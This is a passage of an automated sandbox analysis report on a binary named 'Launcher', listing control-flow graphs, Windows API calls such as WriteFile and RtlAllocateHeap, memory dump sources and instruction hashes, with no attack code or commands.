                                                                                                                                                                                                                                                            control_flow_graph 195 9e8795-9e87ea call 9d4790 198 9e885f-9e886f call 9d11f9 195->198 199 9e87ec 195->199 200 9e87f2 199->200 202 9e87f8-9e87fa 200->202 204 9e87fc-9e8801 202->204 205 9e8814-9e8839 WriteFile 202->205 206 9e880a-9e8812 204->206 207 9e8803-9e8809 204->207 208 9e883b-9e8846 205->208 209 9e8857-9e885d GetLastError 205->209 206->202 206->205 207->206 208->198 210 9e8848-9e8853 208->210 209->198 210->200 211 9e8855 210->211 211->198
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • WriteFile.KERNELBASE(?,?,?,?,00000000,00000000,00000000,?,?,009E8127,?,009D83F3,?,?,?,00000000), ref: 009E8831
                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,009E8127,?,009D83F3,?,?,?,00000000,?,?,?,?,?,009D8191,?,009D83F3), ref: 009E8857
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2331747535.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331723550.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331782458.00000000009F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331805084.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331825928.00000000009FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331847242.0000000000A01000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331867874.0000000000A04000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331908784.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_Launcher.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                                                            • String ID: A2sx
                                                                                                                                                                                                                                                            • API String ID: 442123175-2144273025
                                                                                                                                                                                                                                                            • Opcode ID: f421c586929c336eb044377c2e4afb266659a664750f4d3b7af501548e4d0320
                                                                                                                                                                                                                                                            • Instruction ID: 946aa984817d2cb02ce2a75889401539e5128659afbeed83d2cafb48658aa937
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f421c586929c336eb044377c2e4afb266659a664750f4d3b7af501548e4d0320
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A6218035A002599FCF1ACF5ADD809EAB7BAFF48305B2444A9E91AD7211DB30DD42CF60

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 212 9c1c00-9c1c43 call 9c2620 call 9c2670 217 9c1c51-9c1c7a call 9c26b0 call 9d11f9 212->217
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2331747535.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331723550.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331782458.00000000009F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331805084.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331825928.00000000009FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331847242.0000000000A01000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331867874.0000000000A04000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331908784.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_Launcher.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: EqualPrefix
                                                                                                                                                                                                                                                            • String ID: @Ju$A2sx
                                                                                                                                                                                                                                                            • API String ID: 447727826-361979625
                                                                                                                                                                                                                                                            • Opcode ID: 838a7731a8aaaec30fa7b93123a4c4beabf6e408dd49a71015231ed81101f2c3
                                                                                                                                                                                                                                                            • Instruction ID: 045a64e067acec9eaccf8d87a84ea6ffe7a02a78f762a56eaf9ffd8db6ed3c52
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 838a7731a8aaaec30fa7b93123a4c4beabf6e408dd49a71015231ed81101f2c3
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6D011D70D14208DFCB00EFA8D955BAEBBF4BF44304F40445EE45997351EB74AA04DBA2

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32 ref: 009C1BA8
                                                                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32 ref: 009C1BC8
                                                                                                                                                                                                                                                              • Part of subcall function 009C1870: CreateFileA.KERNELBASE ref: 009C18F3
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2331747535.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331723550.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331782458.00000000009F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331805084.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331825928.00000000009FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331847242.0000000000A01000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331867874.0000000000A04000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331908784.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_Launcher.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: FileModule$CreateHandleName
                                                                                                                                                                                                                                                            • String ID: A2sx
                                                                                                                                                                                                                                                            • API String ID: 2828212432-2144273025
                                                                                                                                                                                                                                                            • Opcode ID: cdf0e01120dda1c1218380570383993c8a269784ecdacb20cc923d54999e3c85
                                                                                                                                                                                                                                                            • Instruction ID: 7bb53103a5df724765f7cfd36ac8a70dbac19f9e380671a54a7fa20df0455542
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cdf0e01120dda1c1218380570383993c8a269784ecdacb20cc923d54999e3c85
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EFF0BDB19082089FC754EF78D9457ADBBF4AB54300F4185ADE4CDD7350EA749988DF82

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 227 9d294e-9d2968 228 9d296a-9d296c 227->228 229 9d2971-9d2979 227->229 230 9d2a4a-9d2a57 call 9d11f9 228->230 231 9d297b-9d2985 229->231 232 9d299a-9d299e 229->232 231->232 237 9d2987-9d2998 231->237 235 9d29a4-9d29b5 call 9d31de 232->235 236 9d2a46 232->236 243 9d29bd-9d29f1 235->243 244 9d29b7-9d29bb 235->244 240 9d2a49 236->240 241 9d2a13-9d2a15 237->241 240->230 241->240 250 9d2a17-9d2a1f 243->250 251 9d29f3-9d29f6 243->251 245 9d2a04 call 9d2305 244->245 248 9d2a09-9d2a10 245->248 248->241 253 9d2a34-9d2a44 250->253 254 9d2a21-9d2a32 call 9ddf69 250->254 251->250 252 9d29f8-9d29fc 251->252 252->236 255 9d29fe-9d2a01 252->255 253->240 254->236 254->253 255->245
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2331747535.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331723550.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331782458.00000000009F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331805084.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331825928.00000000009FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331847242.0000000000A01000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331867874.0000000000A04000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331908784.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_Launcher.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID: A2sx
                                                                                                                                                                                                                                                            • API String ID: 0-2144273025
                                                                                                                                                                                                                                                            • Opcode ID: 0ab19e9f2be1d2d99d2c36c6077e584058e8a061f542b2cb85f53b5c69476b5d
                                                                                                                                                                                                                                                            • Instruction ID: db2c531cc467765410cce967415a54f0f2a2c863aa63d4802ccc3224c6a38373
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0ab19e9f2be1d2d99d2c36c6077e584058e8a061f542b2cb85f53b5c69476b5d
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3631913294411AAFCB15CFA8C9909EDB7B9FF19320B14826BE515E3390D731E945CBA0

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 009D19F9: GetModuleHandleExW.KERNEL32(00000002,00000000,009CE1E1,?,?,009D19BC,?,?,009D198D,?,?,?,009CE1E1), ref: 009D1A05
                                                                                                                                                                                                                                                            • FreeLibraryWhenCallbackReturns.KERNEL32(?,00000000,78733241,?,?,?,009F0244,000000FF), ref: 009D1AEF
                                                                                                                                                                                                                                                              • Part of subcall function 009CB1F0: std::_Throw_Cpp_error.LIBCPMT ref: 009CB21C
                                                                                                                                                                                                                                                              • Part of subcall function 009CB1F0: std::_Throw_Cpp_error.LIBCPMT ref: 009CB238
                                                                                                                                                                                                                                                              • Part of subcall function 009D386F: ReleaseSRWLockExclusive.KERNEL32(?,?,?,009CB2B9,?,009CF9C2), ref: 009D3884
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2331747535.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331723550.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331782458.00000000009F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331805084.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331825928.00000000009FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331847242.0000000000A01000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331867874.0000000000A04000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331908784.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_Launcher.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Cpp_errorThrow_std::_$CallbackExclusiveFreeHandleLibraryLockModuleReleaseReturnsWhen
                                                                                                                                                                                                                                                            • String ID: A2sx
                                                                                                                                                                                                                                                            • API String ID: 1423221283-2144273025
                                                                                                                                                                                                                                                            • Opcode ID: 817b0ad96ed73a1b5ad88d1f8787971aab6139a352780ef2fdea8f2b077491c0
                                                                                                                                                                                                                                                            • Instruction ID: 5604b0a22e5d99b3155a8e4b59906a65d3f21ed42454eff44341e8b96c099d26
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 817b0ad96ed73a1b5ad88d1f8787971aab6139a352780ef2fdea8f2b077491c0
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B4113433688604BBCB216B65EC21B3E77ADEB84B20B10C51BF911873A0DF35E800DB51

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 288 9e7fbc-9e7fde 289 9e7fe4-9e7fe6 288->289 290 9e81d1 288->290 291 9e7fe8-9e8007 call 9dcef8 289->291 292 9e8012-9e8035 289->292 293 9e81d3-9e81d7 290->293 299 9e800a-9e800d 291->299 295 9e803b-9e8041 292->295 296 9e8037-9e8039 292->296 295->291 298 9e8043-9e8054 295->298 296->295 296->298 300 9e8056-9e8064 call 9e6d6c 298->300 301 9e8067-9e8077 call 9e82e9 298->301 299->293 300->301 306 9e8079-9e807f 301->306 307 9e80c0-9e80d2 301->307 308 9e80a8-9e80be call 9e8366 306->308 309 9e8081-9e8084 306->309 310 9e8129-9e8149 WriteFile 307->310 311 9e80d4-9e80da 307->311 331 9e80a1-9e80a3 308->331 312 9e808f-9e809e call 9e872d 309->312 313 9e8086-9e8089 309->313 315 9e814b-9e8151 GetLastError 310->315 316 9e8154 310->316 317 9e80dc-9e80df 311->317 318 9e8115-9e8122 call 9e8795 311->318 312->331 313->312 319 9e8169-9e816c 313->319 315->316 323 9e8157-9e8162 316->323 324 9e8101-9e8113 call 9e8959 317->324 325 9e80e1-9e80e4 317->325 330 9e8127 318->330 326 9e816f-9e8171 319->326 332 9e81cc-9e81cf 323->332 333 9e8164-9e8167 323->333 338 9e80fc-9e80ff 324->338 325->326 327 9e80ea-9e80f7 call 9e8870 325->327 334 9e819f-9e81ab 326->334 335 9e8173-9e8178 326->335 327->338 330->338 331->323 332->293 333->319 341 9e81ad-9e81b3 334->341 342 9e81b5-9e81c7 334->342 339 9e817a-9e818c 335->339 340 9e8191-9e819a call 9dc6f0 335->340 338->331 339->299 340->299 341->290 341->342 342->299
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 009E8366: GetConsoleOutputCP.KERNEL32(78733241,00000000,00000000,?), ref: 009E83C9
                                                                                                                                                                                                                                                            • WriteFile.KERNEL32(?,?,?,?,00000000,?,00000000,?,?,?,?,?,009D8191,?,009D83F3), ref: 009E8141
                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,009D8191,?,009D83F3,?,009D83F3,?,?,?,?,?,?,?,?,?,?), ref: 009E814B
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2331747535.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331723550.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331782458.00000000009F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331805084.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331825928.00000000009FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331847242.0000000000A01000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331867874.0000000000A04000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331908784.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_Launcher.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ConsoleErrorFileLastOutputWrite
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2915228174-0
                                                                                                                                                                                                                                                            • Opcode ID: 29194a70226b35349d78325cbde6d0c054acaf504fe503022392d4b8189e9418
                                                                                                                                                                                                                                                            • Instruction ID: 4cbdde7e9839c7217a4a455f6dc3f50964a090f5fb3d17b239c6fb7d96b824da
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 29194a70226b35349d78325cbde6d0c054acaf504fe503022392d4b8189e9418
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7A6191B1908199AEDF12CFE9CC44AFFBBB9AF49304F140545E908A7252DB36DD06DB60

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 345 9e1f19-9e1f1e 346 9e1f20-9e1f38 345->346 347 9e1f3a-9e1f3e 346->347 348 9e1f46-9e1f4f 346->348 347->348 349 9e1f40-9e1f44 347->349 350 9e1f61 348->350 351 9e1f51-9e1f54 348->351 352 9e1fbb-9e1fbf 349->352 355 9e1f63-9e1f70 GetStdHandle 350->355 353 9e1f5d-9e1f5f 351->353 354 9e1f56-9e1f5b 351->354 352->346 356 9e1fc5-9e1fc8 352->356 353->355 354->355 357 9e1f9d-9e1faf 355->357 358 9e1f72-9e1f74 355->358 357->352 359 9e1fb1-9e1fb4 357->359 358->357 360 9e1f76-9e1f7f GetFileType 358->360 359->352 360->357 361 9e1f81-9e1f8a 360->361 362 9e1f8c-9e1f90 361->362 363 9e1f92-9e1f95 361->363 362->352 363->352 364 9e1f97-9e1f9b 363->364 364->352
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetStdHandle.KERNEL32(000000F6,?,?,?,?,?,?,?,?,00000000,009E1E08,009FB810), ref: 009E1F65
                                                                                                                                                                                                                                                            • GetFileType.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,009E1E08,009FB810), ref: 009E1F77
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2331747535.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331723550.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331782458.00000000009F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331805084.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331825928.00000000009FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331847242.0000000000A01000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331867874.0000000000A04000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331908784.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_Launcher.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: FileHandleType
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3000768030-0
                                                                                                                                                                                                                                                            • Opcode ID: b91765034adc45b849f99ec89c6c64648255f1c1c38a44eece7913f0909da86a
                                                                                                                                                                                                                                                            • Instruction ID: 16a6b4b828e5a9aa33db13daabea560e3340c5f4bf6ca3229f9b0b7167392560
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b91765034adc45b849f99ec89c6c64648255f1c1c38a44eece7913f0909da86a
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6A1181712087814AC7324A3F8C88632BAA9EB56330B380F19E0BA861F1C734DD86D2C1

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 365 9e0487-9e0490 366 9e04bf-9e04c0 365->366 367 9e0492-9e04a5 RtlFreeHeap 365->367 367->366 368 9e04a7-9e04be GetLastError call 9dc6ad call 9dc664 367->368 368->366
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • RtlFreeHeap.NTDLL(00000000,00000000,?,009E46B0,?,00000000,?,?,009E4350,?,00000007,?,?,009E4C96,?,?), ref: 009E049D
                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,009E46B0,?,00000000,?,?,009E4350,?,00000007,?,?,009E4C96,?,?), ref: 009E04A8
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2331747535.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331723550.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331782458.00000000009F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331805084.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331825928.00000000009FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331847242.0000000000A01000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331867874.0000000000A04000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331908784.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_Launcher.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 485612231-0
                                                                                                                                                                                                                                                            • Opcode ID: 0dbdc7353f899aca091e03b219763cfe0fd3f3e3dbbdccf17265a0981bf7e533
                                                                                                                                                                                                                                                            • Instruction ID: f3021590b0c4aa358ee407fbcc69a2e6f81d79e8b8136665251f5aac454e612b
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0dbdc7353f899aca091e03b219763cfe0fd3f3e3dbbdccf17265a0981bf7e533
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 57E08672244745ABCB112BA1ED08BA93A6C9F80751F548021F70CD6170E6788840DB84

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 431 9d2940-9d2945 432 9d2947-9d294d call 9d79f8 431->432 433 9d2993-9d2999 431->433 435 9d291e-9d292d 433->435 436 9d299b 433->436 438 9d299d-9d29a5 436->438 439 9d29e9-9d29f1 436->439 438->439 441 9d2a17-9d2a1f 439->441 442 9d29f3-9d29f6 439->442 444 9d2a34-9d2a44 441->444 445 9d2a21-9d2a32 call 9ddf69 441->445 442->441 443 9d29f8-9d29fc 442->443 446 9d29fe-9d2a04 call 9d2305 443->446 447 9d2a46 443->447 449 9d2a49-9d2a57 call 9d11f9 444->449 445->444 445->447 455 9d2a09-9d2a15 446->455 447->449 455->449
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2331747535.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331723550.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331782458.00000000009F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331805084.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331825928.00000000009FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331847242.0000000000A01000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331867874.0000000000A04000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331908784.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_Launcher.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CriticalLeaveSection
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3988221542-0
                                                                                                                                                                                                                                                            • Opcode ID: a162ea7e8924dd6e7e805b73e9b6c25f1b58cf253a3c9d6e15bdec994459e318
                                                                                                                                                                                                                                                            • Instruction ID: d5f448f0b3c0bb458f06a119d0f8cf346f4da809d7cc958a50bc9453a9a669af
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a162ea7e8924dd6e7e805b73e9b6c25f1b58cf253a3c9d6e15bdec994459e318
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6501F43768C2560ECB25DF78AA6A7ACBB20EFA6334F20D16FD055D93D2CB124855C610

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 458 9e04c1-9e04cd 459 9e04ff-9e050a call 9dc664 458->459 460 9e04cf-9e04d1 458->460 468 9e050c-9e050e 459->468 462 9e04ea-9e04fb RtlAllocateHeap 460->462 463 9e04d3-9e04d4 460->463 464 9e04fd 462->464 465 9e04d6-9e04dd call 9dd224 462->465 463->462 464->468 465->459 470 9e04df-9e04e8 call 9da7ef 465->470 470->459 470->462
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00000000,?,?,?,009D119F,?,?,009C31F2,00001000,?,009C313A), ref: 009E04F3
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2331747535.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331723550.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331782458.00000000009F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331805084.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331825928.00000000009FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331847242.0000000000A01000.00000002.00000001.01000000.00000003.sdmpDownload File
